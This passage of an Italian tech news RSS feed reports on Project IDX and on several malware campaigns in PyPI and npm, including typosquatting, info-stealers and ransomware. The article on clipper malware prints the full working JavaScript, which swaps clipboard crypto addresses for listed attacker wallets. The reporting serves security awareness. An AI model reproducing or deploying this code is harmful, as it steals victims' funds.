		<category><![CDATA[python]]></category>
		<category><![CDATA[simulator]]></category>
		<category><![CDATA[solid.js]]></category>
		<category><![CDATA[workspace]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2328</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2024-01-google-ios-android-idx/">Google aggiunge i simulatori iOS e Android al Progetto IDX</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6aaf396ee17db" class="vc_row wpb_row vc_row-fluid thegem-custom-6aaf396ee17ca4104"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6aaf396ee1a302888" ><div class="vc_column-inner thegem-custom-inner-6aaf396ee1a34 "><div class="wpb_wrapper thegem-custom-6aaf396ee1a302888">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6aaf396ee1cad7037"  >
			<div class="wpb_wrapper">
				<p><strong>Google</strong> ha aggiunto simulatori iOS e Android direttamente all&#8217;interno del suo spazio di lavoro per sviluppatori basato su cloud, <strong>Project IDX.</strong></p>
<p>Il gigante della ricerca ha lanciato Project IDX sei mesi fa come strumento sperimentale per semplificare lo sviluppo di app full-stack e multipiattaforma. Consolida i complessi flussi di lavoro tradizionalmente associati alla creazione di applicazioni mobili e web in un unico ambiente collaborativo.</p>
<p><em>Pasquale D&#8217;Silva,</em> sviluppatore dell&#8217;app di creazione di contenuti alimentata dall&#8217;intelligenza artificiale che Tanaki ha realizzato con Project IDX, ha dichiarato che lo spazio di lavoro condiviso è stato &#8220;così divertente&#8221; e come &#8220;un portale di collaborazione magico&#8221; per il suo team remoto.</p>
<p>Il Firebase Blog è un altro progetto che ora è stato completamente scritto, sviluppato e distribuito utilizzando Project IDX. Anche Lloyd Tabb, Google Distinguished Engineer, lo sta utilizzando per i suoi numerosi progetti di dati in corso, tra cui Malloy, che gli consente di &#8220;avviare rapidamente un&#8217;istanza per risolvere un problema&#8221;.</p>
<p>I nuovi simulatori iOS e Android consentono agli sviluppatori di visualizzare l&#8217;anteprima delle loro applicazioni senza lasciare Project IDX. Per i modelli web e Flutter, viene caricata automaticamente l&#8217;anteprima Chrome o Safari appropriata. Questa funzione consente agli sviluppatori di verificare i layout e il comportamento durante la creazione.</p>
<p>Project IDX ha anche aggiunto nuovi modelli di app, tra cui quelli per Astro, Go, Python, Flask Qwik, Lit, Preact, Solid.js e Node.js, rispondendo alle richieste degli utenti. Anche la galleria dei modelli è stata migliorata.</p>
<p>La configurazione <strong>Nix</strong> alimenta gli spazi di lavoro IDX ed è stata migliorata per facilitare le personalizzazioni. I miglioramenti includono una migliore modifica dei modelli, la modifica del codice con l&#8217;evidenziazione della sintassi e i suggerimenti e la ricostruzione più rapida dell&#8217;ambiente quando si risolvono i problemi.</p>
<p>Ulteriori aggiornamenti per gli sviluppatori includono la regolazione automatica del firewall per i servizi, l&#8217;accesso rapido agli strumenti della riga di comando e il supporto per Docker. Le funzionalità AI di Project IDX sono state estese ad altri 15 Paesi.</p>
<p>Google continua ad arricchire Project IDX e invita gli sviluppatori a continuare a fornire feedback.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee1cad7037{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee1cad7037{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee1cad7037{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee1cad7037{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2024-01-google-ios-android-idx/">Google aggiunge i simulatori iOS e Android al Progetto IDX</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Sonatype scopre altri pacchetti PyPI e npm dannosi</title>
		<link>https://www.webbare.it/2023-06-sonatype-pypi-npm-dannosi/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=sonatype-pypi-npm-dannosi</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 28 Jun 2023 12:51:39 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[infosec]]></category>
		<category><![CDATA[npm]]></category>
		<category><![CDATA[open source]]></category>
		<category><![CDATA[packages]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Pypi]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[sonatype]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2196</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2023-06-sonatype-pypi-npm-dannosi/">Sonatype scopre altri pacchetti PyPI e npm dannosi</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6aaf396ee2770" class="vc_row wpb_row vc_row-fluid thegem-custom-6aaf396ee27607180"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6aaf396ee296d2143" ><div class="vc_column-inner thegem-custom-inner-6aaf396ee296f "><div class="wpb_wrapper thegem-custom-6aaf396ee296d2143">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6aaf396ee2af71741"  >
			<div class="wpb_wrapper">
				<p><strong>Sonatype</strong> continua a scoprire un numero significativo di pacchetti dannosi all&#8217;interno dei registri software <strong>PyPI e npm.</strong></p>
<p>Tra i pacchetti segnalati ci sono diversi pacchetti Python pubblicati su PyPI, mascherati da librerie legittime che prendono il nome dalla popolare libreria &#8220;colors&#8221; di <strong>npm</strong>.</p>
<p>I pacchetti <strong>dannosi</strong>, che includono nomi come &#8220;broke-rcl&#8221;, &#8220;brokescolors&#8221; e &#8220;trexcolors&#8221;, erano destinati esclusivamente al sistema operativo Windows. Una volta installati, questi pacchetti avviavano il download e l&#8217;esecuzione di un trojan ospitato sui server di Discord.</p>
<p>Sonatype ha prontamente segnalato queste scoperte a PyPI, ottenendo la rimozione dei pacchetti dannosi e dell&#8217;account utente associato.</p>
<p>Un altro pacchetto dannoso, &#8220;trexcolors&#8221;, che prende il nome dalla libreria npm &#8220;colors&#8221;, è stato scoperto scaricare ed eseguire un trojan noto come &#8220;trex.exe&#8221; al momento dell&#8217;installazione.</p>
<p>Questo trojan, rilevato da <strong>VirusTotal</strong>, funziona come ruba-informazioni e incorpora tecniche di evasione per impedire l&#8217;analisi e gli sforzi di reverse engineering.</p>
<h5>Malware multipiattaforma: Libiobe</h5>
<p>Oltre ai pacchetti sopra citati, Sonatype ha identificato un pacchetto PyPI denominato &#8220;libiobe&#8221;, probabilmente ispirato alla libreria legittima &#8220;iobes&#8221;.</p>
<p>A differenza dei pacchetti specifici per <strong>Windows</strong>, &#8220;libiobe&#8221; mirava sia ai sistemi operativi Windows che Unix.</p>
<p>Su Windows, il pacchetto distribuiva un eseguibile infetto da trojan, denominato &#8220;V0d220823bb829d3fcc62d10adf.exe&#8221;, nascosto nel codice sorgente come stringa codificata in base64.</p>
<p>Sui sistemi Linux/Unix, invece, è stato eseguito un codice Python minificato, anch&#8217;esso codificato in base64, che ha inviato dati di fingerprinting del sistema a un endpoint Telegram.</p>
<h5>Codice offuscato: FNBOT2, TAGADAY e ZUPPA</h5>
<p>Oltre ai pacchetti PyPI e npm che imitano la libreria &#8220;colors&#8221;, l&#8217;analisi di Sonatype ha rivelato codice offuscato nei pacchetti denominati FNBOT2, TAGADAY e ZUPPA.</p>
<p>Questi pacchetti utilizzano uno schema simile a quello osservato in precedenti casi di attacchi cryptominer, utilizzando sei variabili denominate magia, amore, dio, destino, gioia e fiducia.</p>
<p>La tecnica di offuscamento utilizzata è comunemente facilitata da strumenti online, come quello fornito da development-tools.net.</p>
<p>La scoperta di questi pacchetti dannosi da parte di Sonatype mette in evidenza le minacce persistenti che devono affrontare i registri di software open-source come PyPI e npm. Anche se i pacchetti identificati non introducono nuovi payload o tattiche, servono a ricordare i continui tentativi di sfruttare le vulnerabilità negli ecosistemi open-source da parte di attori malintenzionati.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee2af71741{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee2af71741{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee2af71741{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee2af71741{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2023-06-sonatype-pypi-npm-dannosi/">Sonatype scopre altri pacchetti PyPI e npm dannosi</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>PyPI sospende nuovi progetti e utenti a causa di attività dannose</title>
		<link>https://www.webbare.it/2023-05-pypi-attivita-dannose/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=pypi-attivita-dannose</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 24 May 2023 14:06:14 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[Mobile Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[infosec]]></category>
		<category><![CDATA[Pypi]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[python package index]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2166</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2023-05-pypi-attivita-dannose/">PyPI sospende nuovi progetti e utenti a causa di attività dannose</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6aaf396ee33f1" class="vc_row wpb_row vc_row-fluid thegem-custom-6aaf396ee33e36800"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6aaf396ee35d72549" ><div class="vc_column-inner thegem-custom-inner-6aaf396ee35d9 "><div class="wpb_wrapper thegem-custom-6aaf396ee35d72549">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6aaf396ee37734886"  >
			<div class="wpb_wrapper">
				<p>Il team di <strong>PyPI (Python Package Index)</strong> ha temporaneamente sospeso nuovi progetti e utenti sulla propria piattaforma a causa di attività dannose.</p>
<p>Questa ondata di attività dannose si allinea a una tendenza più ampia osservata negli ultimi mesi in diversi registri open-source. In particolare, incidenti come l&#8217;ondata di pacchetti dannosi sul gestore di pacchetti JavaScript NPM e un attacco simile al gestore di pacchetti Nuget lo scorso anno, che ha coinvolto oltre 140.000 pacchetti dannosi, hanno evidenziato la vulnerabilità di queste piattaforme.</p>
<p>PyPI ha registrato un improvviso picco di pubblicazioni di pacchetti la scorsa settimana. Ad esempio, un attore minaccioso ha sfruttato tre account utente per pubblicare numerosi pacchetti dannosi, tra cui uno chiamato &#8220;OaxStealer&#8221;. Questo pacchetto conteneva codice codificato che, una volta eseguito, scaricava un secondo malware da un servizio legittimo chiamato &#8220;replit.com&#8221;.</p>
<p>Il <strong>malware</strong> scaricato era progettato per rubare informazioni sensibili alle vittime, tra cui credenziali, nomi di file e screenshot.</p>
<p>In particolare, gli aggressori hanno utilizzato la piattaforma SaaS legittima Replit come server di comando e controllo (C2) per raccogliere i dati rubati.</p>
<p>Indagando sull&#8217;account dell&#8217;aggressore, i ricercatori della società di test sulla sicurezza delle applicazioni Checkmarx hanno scoperto il codice completo del server C2 e i file .exe utilizzati nell&#8217;attacco.</p>
<p>Questo incidente serve a ricordare che l&#8217;abuso dei registri open-source non è limitato solo a PyPI, ma rappresenta una minaccia più ampia per l&#8217;intero ecosistema. È fondamentale spostare l&#8217;attenzione dal solo rilevamento degli attacchi all&#8217;identificazione degli aggressori che si celano dietro queste attività dannose.</p>
<p>Checkmarx osserva che la comprensione delle tattiche, delle tecniche e delle procedure (TTP) utilizzate dagli aggressori è essenziale per difendersi efficacemente da questi attacchi.</p>
<p>Per garantire la sicurezza dell&#8217;ecosistema open-source, è indispensabile che la comunità investa nello sviluppo di nuove infrastrutture e nella condivisione dei dati sugli attacchi. Sostenere gli sforzi di piattaforme come PyPI è fondamentale per la prosperità dell&#8217;ecosistema open-source.</p>
<p>Gli sviluppatori e le organizzazioni alla ricerca di framework sicuri sono incoraggiati a esplorare iniziative come OpenSSF S2C2F e progetti comunitari come l&#8217;estensione Overlay, che aiutano gli sviluppatori a valutare i pacchetti open source prima di sceglierli.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee37734886{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee37734886{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee37734886{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee37734886{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2023-05-pypi-attivita-dannose/">PyPI sospende nuovi progetti e utenti a causa di attività dannose</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Malware Clipper trovato in oltre 451 pacchetti PyPI</title>
		<link>https://www.webbare.it/2023-02-pypi-malware-clipper/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=pypi-malware-clipper</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Tue, 21 Feb 2023 09:11:32 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Clipper]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Pypi]]></category>
		<category><![CDATA[python]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2123</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2023-02-pypi-malware-clipper/">Malware Clipper trovato in oltre 451 pacchetti PyPI</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6aaf396ee407f" class="vc_row wpb_row vc_row-fluid thegem-custom-6aaf396ee40716806"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6aaf396ee42713947" ><div class="vc_column-inner thegem-custom-inner-6aaf396ee4273 "><div class="wpb_wrapper thegem-custom-6aaf396ee42713947">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6aaf396ee43f22746"  >
			<div class="wpb_wrapper">
				<p>I ricercatori di sicurezza di <strong>Phylum</strong> hanno scoperto oltre 451 pacchetti nel <strong>Python Package Index (PyPI)</strong> che sono infetti da malware &#8220;clipper&#8221;.</p>
<p>I clipper sostituiscono il contenuto degli appunti di una vittima con qualcosa che avvantaggia l&#8217;aggressore. I clipper più diffusi oggi cercano indirizzi di criptovaluta e li modificano per <strong>rubare fondi.</strong></p>
<p>A partire dal 9 febbraio, Phylum è stata avvisata dalla sua piattaforma di rilevamento automatico dei rischi di una lunga serie di pubblicazioni sospette su PyPI. I ricercatori hanno notato che sembrava simile a una precedente campagna scoperta nel novembre 2022, ma con una tecnica di offuscamento aggiornata e un volume &#8220;radicalmente aumentato&#8221;.</p>
<p>La campagna precedente ha visto gli aggressori pubblicare poco più di due dozzine di pacchetti. Questa volta ci sono oltre 451 pacchetti unici.</p>
<p><em>&#8220;Questo utente malintenzionato ha notevolmente aumentato la propria impronta in pypi attraverso l&#8217;automazione&#8221;,</em> ha spiegato Phylum.</p>
<p>Entrambe le campagne sfruttano il typosquatting, ovvero un semplice errore di battitura nell&#8217;indirizzo di un pacchetto legittimo, per indurre gli sviluppatori a installare versioni dannose.</p>
<p>In questo caso, viene creata un&#8217;estensione del browser Chromium che viene caricata automaticamente all&#8217;avvio di uno dei browser di destinazione, inclusi Chrome, Edge, Brave e Opera, utilizzando l&#8217;opzione della riga di comando &#8220;–load-extension&#8221;.</p>
<p>Il seguente JavaScript viene quindi scritto nell&#8217;estensione che mira a sostituire la crittografia indirizzata con quella controllata dall&#8217;attacker:</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee43f22746{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee43f22746{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee43f22746{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee43f22746{position: relative !important;}}</style>
		</div>
	

	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6aaf396ee45917131"  >
			<div class="wpb_wrapper">
				<p>let page = chrome.extension.getBackgroundPage();</p>
<p>var inputElement = document.createElement(‘input’);</p>
<p>document.body.appendChild(inputElement);</p>
<p>inputElement.focus();</p>
<p>function checkWalletAddresses() {</p>
<p>document.execCommand(‘paste’);</p>
<p>var clipboardContent = inputElement.value;</p>
<p>clipboardContent = clipboardContent.replace(/^(0x)[A-Fa-f0-9]{40}$/g, ‘0x6eb2103839011Ed56c98145b3d3f9d6BE1b4dA63’);</p>
<p>clipboardContent = clipboardContent.replace(/^T[A-Za-z1-9]{33}$/g, ‘TK3dtT7vYLkhUyzLqbQMmsrM36QzFnmfaa’);</p>
<p>clipboardContent = clipboardContent.replace(/^(bnb1)[0-9a-z]{38}$/g, ‘bnb1pncs5ct0rdh3rcdms8708x9jrdy038ml33ceuw’);</p>
<p>clipboardContent = clipboardContent.replace(/^([13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})$/g, ‘bc1qkjm7r677a4fkxcmx9kzlk55a9eaqtztq8zwrc2’);</p>
<p>clipboardContent = clipboardContent.replace(/^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$/g, ‘LcVct9KwHwUKftDNjbBxUtjK9WeUkYbRN3’);</p>
<p>clipboardContent = clipboardContent.replace(/^r[0-9a-zA-Z]{24,34}$/g, ‘rJd2pxs7TxE77W8X3Ezt2QyrhMJixMehPx’);</p>
<p>clipboardContent = clipboardContent.replace(/^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$/g, ‘DFbEVJUt9TcyBgVGriy3DcNBwYhK3s7Yhx’);</p>
<p>clipboardContent = clipboardContent.replace(/^addr1[a-z0-9]+$/g, ‘addr1q8206rrze22rz8g5lggn4clv7zu9mq6w6a6llvw8v3l7r8k5l5xx9j55xyw3f7s38t37eu9ctkp5a4m4l7cuwerlux0qxlhwvz’);</p>
<p>clipboardContent = clipboardContent.replace(/^[48]([0-9AB]{1})([0-9a-zA-Z]{93})$/g, ’41iwYzbS1KKX8DFySxDcGBGGfJzywUeHxWumm4fjYxtYCiHtysXmq3P7RqG18Tv5UDKGNQegefxS2FFqrqeapvB7FuYSBJv’);</p>
<p>clipboardContent = clipboardContent.replace(/^G[0-7A-Za-z]{55}$/g, ‘GCUPRZDN5RGSO3MC4LBIZBJMCS5KNUYQI2HZNUHVEBC5LNWZODWQ24XH’);</p>
<p>\tclipboardContent = clipboardContent.replace(/^cosmos[a-z0-9]{39}$/g, ‘cosmos1cd3hxdkc775zj75xtd3gqp8s7hynxkzewcf58y’);</p>
<p>inputElement.value = clipboardContent;</p>
<p>inputElement.select();</p>
<p>document.execCommand(‘copy’);</p>
<p>inputElement.value = ”;</p>
<p>}</p>
<p>setInterval(checkWalletAddresses, 1000);</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee45917131{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee45917131{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee45917131{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee45917131{position: relative !important;}}</style>
		</div>
	

	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6aaf396ee46fd4892"  >
			<div class="wpb_wrapper">
				<p>Puoi trovare la ripartizione completa della campagna di Phylum e l&#8217;elenco dei pacchetti scoperti <a href="https://blog.phylum.io/phylum-discovers-revived-crypto-wallet-address-replacement-attack">qui</a>.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee46fd4892{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee46fd4892{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee46fd4892{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee46fd4892{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2023-02-pypi-malware-clipper/">Malware Clipper trovato in oltre 451 pacchetti PyPI</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Una campagna malware prende di mira i repository Python e JavaScript ufficiali</title>
		<link>https://www.webbare.it/2022-12-malware-repository-python-javascript/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=malware-repository-python-javascript</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 14 Dec 2022 13:13:26 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Web Developer]]></category>
		<category><![CDATA[Web Marketing]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Phylum]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[ransomware]]></category>
		<category><![CDATA[repository]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2040</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2022-12-malware-repository-python-javascript/">Una campagna malware prende di mira i repository Python e JavaScript ufficiali</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6aaf396ee4fb7" class="vc_row wpb_row vc_row-fluid thegem-custom-6aaf396ee4fa84383"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6aaf396ee51aa4542" ><div class="vc_column-inner thegem-custom-inner-6aaf396ee51ac "><div class="wpb_wrapper thegem-custom-6aaf396ee51aa4542">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6aaf396ee531c1695"  >
			<div class="wpb_wrapper">
				<p>Una campagna di <strong>malware</strong> attiva prende di mira i repository ufficiali di <strong>Python</strong> e <strong>JavaScript</strong>.</p>
<p>La società di sicurezza della catena di fornitura di software <strong>Phylum</strong> ha individuato la campagna. Phylum ha affermato di aver scoperto la campagna dopo aver notato una raffica di attività attorno ai <em>typosquat</em> del popolare pacchetto di richieste Python.</p>
<p>I <em>typosquat</em> sfruttano semplici errori di battitura per installare pacchetti dannosi.</p>
<p>In questo caso, i typos <strong>PyPI</strong> includono: d<em>equests, fequests, gequests, rdquests, reauests, reduests, reeuests, reqhests, reqkests, requesfs, requesta, requeste, requestw, requfsts, resuests, rewuests, rfquests, rrquests, rwquests, telnservrr e tequest.</em></p>
<p>Phylum in seguito ha scoperto che l&#8217;attaccante stava pubblicando i seguenti pacchetti <strong>NPM</strong> che sfruttano anch&#8217;essi il typosquatting: discordallintsbot, discordselfbot16, discord-all-intents-bot, discors.jd e telnservrr.</p>
<p>In quanto cloni delle biblioteche ufficiali, spesso passano inosservati finché non è troppo tardi.</p>
<p>A seconda del sistema operativo del dispositivo della vittima, questo particolare malware scarica un binario Golang rilevante. Una volta eseguito, lo sfondo del desktop del computer della vittima viene aggiornato con una falsa immagine della CIA e il malware tenterà di crittografare alcuni file.</p>
<p>Un file README viene inserito dal malware sul desktop che chiede all&#8217;utente di contattare l&#8217;individuo su Telegram e pagare <em>&#8220;una piccola quota di $ 100&#8221;</em> in BTC, ETH, LTC o XMR. In caso contrario, l&#8217;attaccante afferma che la chiave di decrittazione verrà cancellata.</p>
<p>Secondo <strong>Phylum</strong>, l&#8217;attacco è in corso (dal 13 dicembre 2022) ma è stata rilasciata una nuova versione del <strong>ransomware</strong> che ha anche limitato le architetture supportate.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee531c1695{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee531c1695{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6aaf396ee531c1695{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6aaf396ee531c1695{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2022-12-malware-repository-python-javascript/">Una campagna malware prende di mira i repository Python e JavaScript ufficiali</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
